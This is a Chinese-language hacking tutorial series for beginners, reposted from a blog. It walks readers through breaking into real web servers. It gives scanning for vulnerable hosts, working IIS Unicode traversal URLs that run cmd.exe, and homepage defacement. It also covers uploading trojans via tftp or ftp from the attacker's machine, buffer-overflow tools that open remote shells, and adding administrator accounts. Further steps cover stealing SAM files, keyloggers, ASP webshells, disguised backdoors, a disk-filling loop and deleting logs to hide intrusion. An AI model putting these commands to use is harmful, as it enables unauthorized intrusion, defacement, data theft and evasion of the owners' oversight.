我認為這是一套适合初學者由淺到深的文章,是以強烈推薦給大家,作者從基礎講到最近比較火的漏洞,可能有些人看來是淺了些,但是的确很适合想幹點啥但又不知道怎麼辦的菜鳥們 。
第一節,伸展運動。這節操我們要準備道具,俗話說:“工欲善其事,必先利其器”(是這樣嗎?哎!文化低……)說得有道理,我們要學習黑客技術,一點必要的工具必不可少。
1,一台屬于自己的可以上網的電腦。這樣你可以有充分的支配權,上網不用說,否則你怎麼看到我的文章?wap?呵呵!屬于自己很重要,否則安全性是個很大的問題。第一點相信大家沒有問題。
2,windows2000/nt,别和我說98/me,他們是你們同學用來玩遊戲的!(當然,我也是鐵杆game fan)對網絡支援極差,指令受限制,很多軟體又不能用,對黑客來說使用起來絆手絆腳,非常不利。這裡我推薦2000,這是一個很成熟的系統(漏洞還是有一堆)。推薦雙系統,這樣黑玩搭配,幹活不累。
3,冰河。中國第一木馬,中者數不勝數,國人驕傲。雖然用冰河根本不能算黑客,但它确實能培養你對黑客的興趣,同時幫助你了解網絡,相信很多黑客同學都是這樣起步的。靜止寫的那篇冰河教程很不錯,大家仔細看看。而且,以後你學會入侵伺服器後,用冰河操作也會減少工作量(我是懶蟲,爽!)
4,oicq。我們學黑客,可不是學泡mm!bfctx你………… 息怒息怒!我們當然是學黑客,但不要忘了,衆人拾柴火更高,我們通過cshu的成員清單,互相聯系幫助,對提高水準很有幫助!另外我要廢話一句:據我了解,現在黑客網站下載下傳最多的都是針對oicq的破解工具,我個人認為很無聊,偷個密碼代表什麼,浪費時間!最後補充:mm不能不泡。(誰砸我??!!)
5,superscan。很好用的端口掃描器,速度超快,功能一流,一旦擁有,别無所求……(打住!)不論是找木馬受害者,還是掃伺服器端口,它都非常有效,cshu強烈推薦!
6,一本筆記本/便條,網上資料相當多,黑客處理的也是非常之多。良好的習慣決定了你的效率,準備一本筆記本,記錄下你的成果,殭屍電腦,木馬利用,指令,密碼……堅持一下,你會發現你的效率大幅上升的!
7,lc3.著名nt/2000sam破解程式,有時我們拿不到足夠權限,又沒好辦法,那麼lc3是最好的解決辦法,隻要你拿的到sam,你就是伺服器它爺爺!本站有其破解程式,支援了暴力破解!
8,程式合并。這是玩木馬必需的,雖然木馬是很低的手段,但有時配合巧辦法(以後我會介紹)确實能夠達到意想不到的效果,朋友們可以在空閑時玩玩木馬,很有趣,若你能巧妙的騙過mm,那麼webmaster也可能被你騙倒:〉 (比較理想化)
9,流光4for 2000/nt。可能是世界上最好的綜合類黑軟!中國的驕傲,它內建了很全的漏洞資訊,速度快,方法多,對有漏洞的主機是毀滅性的打擊,操作又友善,是快速黑站必不可少的精品工具。超級吐血推薦!!
10,良好的心态,穩定的情緒,刻苦鑽研的精神,刨根問底的作風,打掃房間的習慣。黑客是門很高深的學問,不要幻想一步登天,失敗是常有的事,千萬不可灰心。在那麼多黑軟的包圍下,切不可完全依賴他們,一定要了解它們利用什麼原理工作。對任何一個小問題,小細節,一定要問清楚,cshu就是給大家互相交流的場所哦!黑完後不要得意忘形,打掃戰場也很重要,以防萬一。
第一節操完,可能很無聊,我就這點水準,大家見諒!這裡我說一句大話:做完菜鳥操,包你會黑簡單的站(哎喲!心慌了!)
下一節操我們要介紹如何掌握一台主機的基本資訊,期待中……
真是太對不起大家了,隔了那麼久才寫這篇教程,我這幾天實在太忙,大家還是體諒一下我吧,好了,開始做操。
今天的内容是獲得主機的資訊。 我們要黑一台主機,首先要了解它的資訊,包括它的類型,使用者清單,目錄,端口,漏洞等等。
第一部,呵呵,先在ie裡看看吧,mmmm.....做的還行,挺精緻的!主要是我們肯定了它現在是正常的。 然後,我們應該知道它的ip,很簡單,ping它一下就可以了。
知道了ip,下一步應該确定端口了。下面是一些常用的端口的預設值
21--ftp 重要哦
23--telnet 歡呼吧
25-smtp 盡管重要,但似乎沒什麼可利用的
53--domain 同上
79--finger 可知道使用者資訊了
80--http 要看網頁,沒它不行吧
110--pop 收信的
139--netbios 共享用的,很有利用價值哦
3389--win2000超級終端 呵呵,這個好!
其實端口有上千種,這些最最常用
我們怎麼知道伺服器有什麼端口打開呢??去找個掃描器吧,x-scan ,super scan,flux等等很多哦。這裡我推薦super scan ,速度很快,本站也有其教程哦!用法還是比較傻瓜的,估計大家不會有問題,輕輕幾點,打開的端口就出現了。不錯不錯,上面說到的都有(太理想化了吧!)
那麼我們該如何應對呢?
ps:忘了說一聲,順便掃一下7626,冰河有也說不準哦:)
若有ftp,那就用用匿名登陸。自己動手也行,最好用x-scan flux等吧!反正,有ftp就有一份希望
telnet在!好!telnet 111.111.222.222,出現視窗了吧!嗯?要密碼?看來網管還不是超級白癡:)随便猜個,錯了,閃人!
smtp,看着它,無奈
domain,一般它帶了區域網路了
finger 可以知道使用者清單了,不好,忘了用法了,幸好finger很少出現
80肯定在,我們等會來對付它
110 有smtp,pop在也不奇怪了
139 找個掃描器來找找有沒有露在外面的共享吧,日後也用得着
3389 太太太好了!!打開用戶端吧,用輸入法漏洞試試,成了就幹了它!不成也沒事,我們以後完全控制它3389會很友善的。
端口掃完了!我們在多了解它一點吧!追捕大家都知道吧,其實用它擷取主機資訊也不賴哦。打開追捕,輸入ip,選擇智能追捕,是不是有很多資訊出來了?雖然不能直接利用,但畢竟我們有對它有了進一步的了解。
掌握了那麼多資訊,我們該做點什麼了,一般黑客入侵都是*着系統漏洞,不會都傻傻地去暴力破解的。我們現在就要看看它有什麼漏洞。
對漏洞大家可能不太了解,我這裡也不能一一說明了,太多了,感興趣的話去論壇找freedom吧!
目前廣泛利用和存在的漏洞有:unicode,unicode後續,iis溢出,.idq,.frontpage extend,輸入法漏洞等等大漏洞。 至于如何确定,呵呵,絕對不會是一行一行地在ie中試吧,拿出x-scan吧,很好的掃描器哦!
稍微設定一下就上路吧!過了一會,呵呵,報告出來了,快看,哇!漏洞一大堆!這下賺了!各條漏洞都有詳細的資訊,大家看吧,總比我說的準了。
現在這台主機已經和我們成為親戚了,要讓這位親愛的親戚做點事,就要開始各種攻擊了,下回我們就探讨一下最最可愛的unicode漏洞,各位可能就會在unicode中完成第一次黑客體驗,再見:)
------------------------------------------
今天我們談談unicode漏洞,這可是基礎中的基礎,重點裡的重點,不懂的一定要好好學。
2000年10月17日中聯綠盟釋出了以下的安全公告:
微軟IIS 4.0 / 5.0 擴充UNICODE目錄周遊漏洞
遠端漏洞:是
本地漏洞:是
釋出日期:2000年10月17日
更新日期:2000年10月17日
受影響的版本:
Microsoft IIS 5.0 + Microsoft Windows NT 2000 Microsoft IIS 4.0 + Microsoft Windows NT 4.0 + Microsoft BackOffice 4.5 - Microsoft Windows NT 4.0 + Microsoft BackOffice 4.0 - Microsoft Windows NT 4.0
這可是中國乃至全球網絡安全界的一次大變節,入侵nt/2000系統變得如此簡單,不打更新檔的死路一條。
下面開始正式學習:
一,UNICODE漏洞的原理
此漏洞從中文IIS4.0+SP6開始,還影響中文WIN2000+IIS5.0、中文WIN2000+IIS5.0+SP1, 台灣繁體中文也同樣存在這樣的漏洞。
中文版的WIN2000中,UNICODE編碼 存在BUG,在UNICODE 編碼中
%c1%1c -〉 (0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = '/'
%c0%2f -〉 (0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = '\'
在NT4中/編碼為%c1%9c
在英文版裡: WIN2000英文版%c0%af
在中文win2k裡:%c1%1c
此外還有多種編碼,不一一闡述。
本文例子均以win2k為準,其他類型請自行替換。
二,一切從基礎開始
由于winnt\system32\cmd.exe的存在,使遠端執行指令變為可能,在浏覽器裡輸入以下請求:(假設11.11.22.22有漏洞)
11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
學過dos的應該可以看懂,其實就是利用當中的非法請求使我們可以連到system32下,如果inetpub\目錄不合winnt同盤,或者目錄級數有改動,可能會引起請求失敗。
如果成功,那麼在浏覽區可看到如下資訊:
Directory of C:\inetpub\scripts
2000-09-28 15:49 〈DIR〉 .
2000-09-28 15:49 〈DIR〉 .. (假設目錄中沒有檔案,實際上有一大堆)
是不是有自己機器的感覺了,正點!就是這種感覺!
cmd.exe相當與dos裡的command.com,是以,我們可以執行很多指令了!
大家請注意:/c後面的+,實際上,他就是空格,請記牢!dir開始就是dos指令了,我們可以更改一下:
11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\autoexec.bat+c:\winnt\auto.exe
會dos的朋友一定懂其意義了,不懂的請去看書 .
不用說,大家也知道我們就可以利用它來對有漏洞的機器展開攻擊了!
三,實戰演練
1,修改首頁!(是不是很爽?)
一般首頁位置在c:\inetpub\wwwroot下,但要是改了路徑,就需要找找了。
分析法:用dir看各個盤符的根目錄,看可疑的就進去看,運氣好的在一分鐘裡找到,這要看運氣和直覺。
dir/s法:首先在看其首頁,找個圖檔或連接配接,看它的檔案名,比如,11.11.22.22首頁上有一幅圖檔,右擊,屬性,看到了嗎?iloveu.gif,然後我們利用unicode輸入這條指令dir c:\iloveu.gif /s意味着查找c盤下所有目錄裡的iloveu.gif,注意實際應用時别忘了把空格改為+,如果沒有繼續找d盤,很快就能确定首頁目錄的。
找到了目錄,就要對它開刀了!一般預設收頁為index.htm,index.html,index.asp,default.htm,defautl.html,default.asp中的一個,現在我們确定11.11.22.22中為index.htm
那麼我們就修改它吧!
最友善的方法:echo法。echo是一個系統指令,主要用于設定回應開關,而echo cshu >c:\autoexe.bat就是把cshu加入autoexec.bat裡并删除原有内容,echo cshunice >>c:\autoexec.bat就是加入cshunice但不删除原有内容,這樣我們就可以逍遙的改了。
11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+echo+hackedbycshu+>c:\inetpub\wwwroot\index.htm
回應為:HTTP 500 - 内部伺服器錯誤
通過對cmd的分析,袁哥得出一條簡便的方法,加入"符号
11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+echo+hackedbycshu+>c:\inetpub\wwwroot\index.htm
11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+echo+2001730+>>c:\inetpub\wwwroot\index.htm
回應為:cgi錯誤,不用理會
兩條指令一下,呵呵,再看看11.11.22.22,是不是烙上我們的大名了?不錯吧
而在實際操作中,可能袁哥的方法也會失效,這時,我們就可以copy cmd.exe 為另一個exe,記住路徑,用copy後的來echo
例如:11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+cmd.exe+c:\a.exe
11.11.22.22/scripts/..%c1%1c../a.exe?/c+echo+hackedbycshu+>c:\inetpub\wwwroot\index.htm
2,上傳法:echo有點不講道理,把人家的檔案破壞了,要是想在首頁上增光添彩,那就應該用改好的首頁
上傳,這個我們後面介紹。
幾點忠告:
1,對于沒有首頁的機器(就是正在建立的首頁),不要改它,這很沒水準,也很沒道德
2,echo前記得幫他們做好備份
3,不準在首頁裡加入惡性語句
2,下載下傳檔案
要是有什麼有用的檔案被你發現,那我們如何下載下傳呢?
最簡單的方法:把檔案copy至網頁目錄下。copy c:\email\baby.eml c:\inetpub\wwwroot\baby.zip,然後,下載下傳11.11.22.22/baby.zip就行了,注意!實際應用中要記得對檔案名進行修改,總之不能暴露。
别的方法:對不起,沒想好:)
3,最重要的上傳
一般方法:ftp法
首先建一個ftp腳本檔案:c:\hehe.haha(名字亂取把),申請一個ftp賬号,然後用echo吧
echo+user yourname >> cc:\hehe.haha (yourname是使用者名)
echo+yourpasswd >> c:\hehe.haha (yourpasswd是密碼)
echo+get setup.exe >> c:\hehe.haha 要下載下傳的檔案
echo+quit >> c:\hehe.haha
完了以後:ftp+/s:c:\hehe.haha,由于是ftp主機,那麼速度一定很快,過一會setup.exe就會出現在目前目錄了(也就是cmd所在目錄)
别忘了先上傳到ftp主機,不要做馬大哈哦!
最簡單的方法:tftp法。
這種方法不用中轉伺服器,首先準備一個tftp服務端,它的作用就是把你的機器做成一個tftp伺服器,利用漏洞機器來下載下傳(注意,運作tftp時不要運作其他的ftp軟體)
在這裡我推薦cisco tftp server,自己去找找把,實在沒有來找我:)
安裝好後運作,别忘了設定好預設目錄,否則會找不到檔案
tftp指令:tftp -i 1.2.3.4 GET ihateu.exe c:\winnt\ihateu.exe(ihateu.exe在預設目錄裡)
1.2.3.4為你的ip,用unicode運作一下,會看到tftp server裡有反應了,這就好了,不一會,檔案就傳上去了,友善把!
學會了上傳,我們就可以好好改首頁,還可以上傳木馬,還可以把程式放上去運作…………(運作程式和在dos裡一樣)
4,如何清除痕迹
雖然國内主機紀錄ip的不是很多,但萬事小心為妙,unicode權限達不到admin。用cleaniislog行不通,就…………直接删吧!
C:\winnt\system32\logfiles\*.*
C:\winnt\ssytem32\config\*.evt
C:\winnt\system32\dtclog\*.*
C:\winnt\system32\*.log
C:\winnt\system32\*.txt
C:\winnt\*.txt
C:\winnt\*.log
全……擦掉!
四,細節問題。
1,遇到長檔案名怎麼辦?
c:\program files\
就用c:\"program20%files"\
2,遇到空格怎麼辦?
0%代替喽,或者xx yy=xxyy~1
3,如何做個很大的檔案?
目的就是破壞啦!我不喜歡不過教教你們啦
@echo off
echo big > c:\a.a
:h
copy c:\a.a+c:\a.a c:\a.a
goto h
注意不要亂來啊!
4,輸入指令,沒反應或反應不對。
:)請檢查檢查再檢查指令的正确性,可能沒有漏洞,那就閃人!看在你看到這裡那麼給我面子的份上,在給你幾個吧!
不一定有用哦!
5,如何找到unicode漏洞的主機
呵呵:)最好的方法自然是………………一個一個ping,一個一個試喽:)
不要打我呀!我說我說。最好找一個cgi掃描器,unicode查找器多如牛毛,随便找個吧!
6,我copy,del檔案,怎麼顯示aceess denined?
這個不好辦了,由于unicode所擁有的權限有限,出現上述情況很正常,我們要做的便是提高自己的權限!
這個我會在今後介紹,現在你可以試試attrib
attrib -r -h -s c:\autoexec.bat
再對autoexec.bat進行操作,看看有沒有效果,成功率不高,不好意思!
7,我黑了首頁,天下無敵?
我本來想對你說:“見你的鬼去吧!”不過想想不大禮貌,有失我紳士風度,是以改個口
echo首頁或改首頁在不懂黑客的人看起來很了不起,不過,它最多算是一個基礎,拿到admin才是我們的終極目标!
對cshu全體成員來說,不準去改正在建立的網頁!這是我們的原則!
要是你想耍耍威風,那也可以了解,那就去黑外國的,或者url欺騙也是個好選擇
8,我如何做更多的事?
第一,努力提高權限
第二,由于cmd的限制,我們可以做的不多,那就要程式幫忙,上傳吧!切記,要隐秘!
一,frontpage擴充攻擊。
為什麼把它放第一位呢?原因很簡單,它最最友善,frontpage伺服器擴充是一種友善的遠端站點管理功能,可是由于某些網管白癡的疏忽(為什麼白癡滿街飛?)不設定通路密碼,如果那樣的話,我們隻要用一個frontpage就可以黑它了!!這完全不是黑客工具,但它确實辦到了,還要感謝白癡網管和微軟啊!
具體做法:
1,準備frontpage,我是用dreamweaver的,但它不能黑啊:)最好是2000版,隻是不要是老掉牙的版本就行了。
2,找一台有frontpage擴充的主機,可以用流光,也可以用搜尋引擎查找/_vti_pvt/,這是frontpage擴充的标志。
我的看法:
這個漏洞隻能說明網管的疏忽,對我們而言是沒有什麼利用價值的,隻可以改改網頁,也許這也夠了,但要進一步控制主機,此漏洞就無能為力。消遣時可以玩玩。
二,iis.printer溢出攻擊
據說緩沖區溢出攻擊是黑客入侵時70%所選的方法,看起來有點誇張,但确實有道理,因為暴力密碼破解在網絡上變得非常之慢,而像unicode的解碼漏洞所取得的權限又太低,而緩沖區溢出一般可取得system權限,是非常有用的!
具體原理我也不是很清楚,隻能說個大概:當我們向系統發出超出緩沖區大小的資料處理請求時,便會引發溢出,并彈出錯誤對話框,我們常看到的“非法操作”其實也是可能是由于溢出。而當溢出時,eip發生錯誤,有彙編知識的朋友應該記得,eip是控制執行代碼的位置(順便問一下,有沒有會crack的高人,記得做我老師)這時加入一段惡性代碼,算好發生溢出時的eip值,這樣溢出時就會執行惡性代碼而不是當掉。非法操作我們知道多的不得了,是以……溢出攻擊是非常強大的!
由于彙編對于我們來說較難掌握,加之對溢出的了解很有限,那麼我們隻能借助高手們的程式來黑了。
具體方法:
1,準備iishack,本站有下載下傳,該版本可以對多種系統進行攻擊。
2,用x-scan或流光掃描一個有iis.printer漏洞的主機,然後就可以攻擊了。
3,在指令行方式執行iis5hack (主機ip) (端口号,預設80)(系統代号,具體可參考程式的說明) ( shell口)
例如:iis5hack 11.11.22.22 80 1 111(以為在111端口開一個shell)
4,用nc或telnet連上,nc/telnet 11.11.22.22 111,成功的話就可以控制機器了,加個使用者,做個代理……
這算是一個比較有用的漏洞了,它能幫助我們取得system權限,其實和admin差不了多少了,對于做一台跳闆是非常有利的,希望大家熟練掌握。
三,idq/ida緩衝區溢位攻擊
這是時下很熱門的了,原理和上面的printer相似,目前我隻找到了iis5的攻擊程式,在cshu裡也可以找到的,我們準備的是snake的gui版本,很友善的。
1,準備snakeiis溢出程式。可以從本站下載下傳。
2,ida/idq漏洞很多的,但win2k的伺服器就不是那麼普遍了,是以用你熟練的掃描器去找一打win2k的機器吧。
3,程式的界面是很傻瓜的,把ip填入,選擇好類型,按下溢出按鈕,顯示shellcode發送完畢。
4,telnet/nc到你設定好的端口,如果成功的話,會顯示目錄下的資訊(因為預設shellcode是dir)
5,歡呼吧!再次溢出,别忘了改shellcode為你想要的代碼哦。
6,重複4,很快一台新鮮的win2k被你控制了!
我很喜歡用這種攻擊,因為win2k的3389可以很友善的為我做事,省力地搞到一台win2k,然後慢慢享用,爽到根尖細胞啊!大家應該掌握這項方法。
四,*bsd telnetd溢出攻擊
又是溢出,不過這個可是真正的熱點哦,最近紅盟等大型安全網站被黑就是因為這個!是以看看吧
1,使用fbsdhack for win2k來攻擊,本站有下載下傳的
2,還是要找到這樣的主機,一般是xnix的,比較少的,用專門的掃描器吧,我會在不久放出來。
3,等吧!這個漏洞要發送的資訊很大,大約16mb,可怕吧,是以最好用高速殭屍電腦
4,有幸成功了,記得請我吃飯!
這個漏洞的利用比較有難度,從找機器開始就是。但作為黑客愛好者,我們沒有理由去回避它!
五,密碼暴力破解
這是最最原始,也是最最基本的攻擊的方式了,利用字典檔案或暴力模式,對密碼進行探測。費時費力,但若有經驗的話,可以縮短這一過程。
1,找一個破解器,有ftp,http,smtp,pop3,telnet等等類型。
2,找到一台相應的主機。
3,設定一番,上路吧!你可以睡覺,可以去machine(就是做作業),可以去泡妞……就是不要傻等。為什麼呢?因為會傷視力的:)怎麼倒了一片,起來起來!
4,萬一成功了(之是以用這個詞,是因為成功率很低的)表明你運氣旺,趕緊下線,買彩票去吧^_^
大家好,這幾天被cgi程式搞得頭昏腦脹,主要還是51的錯,什麼破東西,那麼多錯誤!現在隻好暫時借人家的地方用。
這是菜鳥操的最後第二節,說實話我還可以寫很多的,但是作業還欠了一大堆:(為什麼我沒有滿舟的狗屎運?算了算了,我不合那種欺世盜名之輩一般見識,開始做操吧!
不知道大家對unicode和溢出攻擊是不是熟練了?沒有的要加油哦!今天我們來談談權限的提升。
在windows系統中,最高的權限掌握在administrators的手裡,在xnix中稱為root,我們要完全掌握一台機器,拿到admin是不可或缺的。
首先說說最簡單的:system to admin
當我們用溢出攻擊成功後,其實我們已經拿到了system權限(具體看每種攻擊而可能有所不同)這時我們很容易拿到admin權限。首先看看一下指令:
net user 察看使用者表 net user username pass /add(添加密碼為pass的使用者username)
net localgroup 察看組 net localgroup guests cshu /add 把cshu使用者加入guests組
net use \ip\ipc$ "password" /user:username 這是遠端連接配接的指令
假如我們溢出了11.11.22.22,那麼這樣做吧!
net user (看到了iusr_machinename的使用者了,它一般沒什麼權限的)
net user iusr_machinename cshu (把它的密碼設為cshu)
net localgroup administrators iusr_machinename /add(加入administrators組)
這樣我們就擁有了iusr_machinename這一賬号,admin權限,簡單吧!
熟悉一下net use 指令:
net use .11.22.22\ipc$ "cshu" /user:iusr_machinename 建立連接配接
copy c:\haha.exe .11.22.22\admin$ 把haha.exe 複制到機器c:\winnt\system32上,若是c$.d$,就表示c,d盤
net time .11.22.22 看到了時間了,比如是8點
at .11.22.22 8:03 haha.exe 就會在8點3分執行。
net use .11.22.22 /delete 斷開連接配接
應該是很簡單的。這樣我們就可以随心所欲地操作11.11.22.22了,admin是最高權限,是以沒有限制的:)
是不是很簡單?是以我是溢出是很厲害的攻擊方法。
3389知道吧!如果能進入,那麼用上面的指令也可以輕易拿到admin的,不過呢,有3389漏洞的機器已經不多了。看你運氣了!(本站有幾篇關于3389的好文章)
總的來說,還是unicode的機器最多,為什麼白癡網管不會滅絕呢:)雖然unicode拿admin有一定難度,但還是要試試的。
首先,我們檢查一下unicode在這台機器上的權限,一般看讀寫權限和運作權限。用copy 或del指令便可确定讀寫權限,然後上傳檔案運作一下便可知道運作權限。
1,如果我們可以對winnt\repair和winnt\config進行通路,sam檔案就在裡面(win2k裡是sam,nt4裡是sam._)那麼用tftp 把get改成put下載下傳下來,或者把它複制到inetpub\wwwroot下,改成zip下載下傳。
拿到sam後,用lc3破解版暴力破解吧,這種方法比較費時。
2,要是有運作權限,拿就抛個木馬上去吧!雖說木馬可能也會沒有權限,但自啟動的模式在admin登陸後可能會自己提升了權限。要注意的是,最好放最新的木馬,因為木馬很容易被防毒軟體清除!
3,其實和2差不多,隻不過變成了鍵盤記錄器,選個國産的,一般防毒軟體不會殺出來,認真配置好後傳上去,下線睡覺或是做家務去!等到網管用了機器,密碼就會被紀錄下來,我們在去取,admin就順利到手了:)
4,getadmin和pipeupadmin,前者是nt4用的,後者是2000。看看幫助知道使用方法後(其實猜都猜得到)就可以提升一個使用者的權限,有一步登天的感覺!
5,手工做個bat檔案,裡面是建立使用者等指令,然後把它放到自啟動下,有很多途徑:documents and settings下的開始菜單下的啟動,知道了吧,至于要順利放進去的話,會遇到空格長名等等問題,就看你的基本功了。win.ini裡有load,加進去。還有便是系統資料庫,好好研究一下regedit.
6,本地溢出。這個比較高深,我能告訴大家的隻是,去四處找找本地溢出程式。
總的來說,unicode改首頁是非常簡單的,但是若是要取得更高的權限,就要一番努力,上面的方法隻是些思路,實際操作時需要具體處理,開動腦筋,把方法都結合起來。(是不是聽起來有點玄?)
想想好像沒有什麼其他的途徑要說了,什麼?linux,呵呵,我還不大懂,就不在這裡瞎說了。
那今天就說到這裡了,6裡面我會說說後門制作,小問題和我的一點經驗。期待吧!
這是最後一節了,寫的傻傻的,但我畢竟堅持下來了,值得鼓勵!(偶爾阿q一下)在寫菜鳥操的同時,我們的cshu(cshu.51.net)也在默默成長,但現在我要準備離開了,真是有點舍不得。在今後的日子裡,還請大家多多支援cshu和christ,freedom他們。
今天說點什麼呢?沒有主題,亂談一通吧!
首先我要吐一次血,當然是為了推薦一樣東西,就是流光!(那麼沒創意,老土!)不管怎麼說,小榕的流光應該是中國第一黑軟,他綜合了諸多的攻擊手段,使攻擊便捷化,當然可能讓我們養成了懶惰的習慣。不會用流光的最好去學學。
我來說說我自己覺得最有用的幾個項目:
1,探測----掃描pop3/ftp/nt/sql主機,要是無目的地黑,那麼用這個再合适不過了。進去後填好ip範圍(範圍可以掃大一點,它很快的),至于類型嘛,要是你要一大堆unicode,那麼選擇iis/frontpage再合适不過了,要是要更高的權限,sql是不錯的選擇。完成後,表格裡會多出一大堆東西。
remote execute-x 這是幾種不同的unicode,用它比用ie來執行友善多了,但是echo有問題(是我自己不會,會的朋友快教我)
remote ftp pcaw file method-x 這是遠端擷取pc anywhere的密碼檔案,要使用的話,你首先要有一個ftp賬号,去申請吧!順利拿到cif檔案後,用流光自帶的工具就可以解開密碼,很爽的!
remote ftp sam -x 拿sam的,還是用最好的lc3來解吧!
此外還有一點變通,大家肯定讀的懂的。
2,探測----進階掃描工具。這可是流光4中的重頭戲,綜合了很多漏洞,還可以用plugin功能加入新的漏洞。這項功能很适合對某一站點進行探測,很快掃出漏洞後,流光會生成一個報告檔案,其中包含漏洞的連接配接,要是你看不懂的話,建議你拿出x-scan,裡面有漏洞描述的。
3,工具----nt管道遠端指令,種植者,這兩項功能對我們攻擊nt來說是相當好用的。但前提是要有賬号,相信在此之前你應該有幾個了吧,那就快點試試吧!
然後我想說說一些黑站的經驗。
當我們用unicode控制一台機器時,我向大家推薦用asp木馬,阿新的改良版,本站有下載下傳的。上傳asp檔案前不要忘了修改list.asp中的位址資訊,最好也放一個cmd.asp上去,運氣好的話,可以運作指令的。
上傳好後,ie裡輸入其中index.asp的位址,呵呵,我們就能友善地管理其中的檔案了,可以改網頁,改代碼,上傳腳本檔案麻煩?那就用它來生成吧!
推薦他的最大原因便是----便于隐藏!一般網站總有一個龐大的目錄,選擇一個深的,放進去,網管很難發現的:)
最後對大家說一句,要是有備份目錄(很多網站都有的),最好也放一份進去。有一次我用這個東西修改一家網站的首頁,改了兩三次網管也沒删掉,可是突然一天不行了,原來他用了備份的網頁(還算機靈吧)
我想對大家說,對于國内網站,最好不要惡意去攻擊,因為我們是中國人嘛!在5/1期間,我發現有一些國内站點被黑,留下的頁面上不是poison box,而是中國人的話,這真是無恥到了極點!!!!大家千萬不要學哦。還有,現在網上有很多還沒有網頁的主機,往往有很多漏洞,對于這種機器,竟有一些小人也會去改收頁(比如上海那個姓楊的小子)這算什麼?顯示實力,炫耀技術?呵呵,見鬼去吧!
我的建議是,不要改它的首頁,而是努力去拿admin,控制它,這樣我們有很多選擇:殭屍電腦,等它有正式首頁後可以黑,或者把我們的首頁放上去!比申請好多了,權限又足!當然很危險:)這樣做是不是有品位多了?
要是我們拿到了admin,但有時卻不能執行一些指令,那很可能是因為服務啟動的問題。試着用以下指令:
net start termservice 啟動win2k的終端控制
net start workstation 打開net use 功能
net start lanmanserver 打開ipc
net start eventlog 啟動日志(你不會那麼傻吧!stop)
net start schedule 打開計劃(at)
net start server 共享
還有很多,net指令裡去找吧!
打開telnet
1,遠端去運作ntlm.exe,流光裡有
2,net stop telnet
3, net start telnet
我推薦幾種後門:winshell(預設端口5277)相對于srv,它好一些。remotenc這個是榕哥的作品,可以以指定使用者執行,還可以自己起服務的名字,很棒的!
至于服務的名字,建議大家去看看win2k的程序名,學着起相類似的名字,要做到使網管看到了也不會引起警覺,或是有警覺也不敢去删,呵呵,這樣就最好了!
代理問題。我推薦大家自己去做代理,控制了一台機器後,用snake前輩寫的skserver去做個sock5。
具體做法就不詳細說了,因為比較普通,隻要熟悉一下用法就可以了。
做好了sock5,我們可以上oicq,下棋都用它,sock5代理可是很少見的哦!
要是實在拿不到sock5,用http也可以,這裡推薦一個軟體tcp2http,它具有很多功能。在給個站點:dzc.126.com國内最最好的的代理站點,怕死的朋友千萬不要錯過。
最後說說一些對于菜鳥同志的建議:
不要把黑當作一種顯示自己的行為,要是你想耍威風,用url欺騙來騙mm最合适了,還可以弄個yahoo什麼的……
不要在一項技術上停留過長時間,當你熟練掌握後,應該迅速學習下一個新技術。
不要和被你黑的網管過多接觸,前車之鑒哦。
對于一台好機器要做好後門,不要輕易失去它。
想好好學黑客的話,就常去各大論壇轉轉,仔細讀教程,忘記聊天室和網絡遊戲吧!
實踐是最好的教程,再次重申!
應該多學計算機的其他方面的知識,任何知識在一定場合都是有用的。
程式設計技術……好像太難了,不過再難也要學。
想不出來了………………
本文轉自loveme2351CTO部落格,原文連結:http://blog.51cto.com/loveme23/8580 ,如需轉載請自行聯系原作者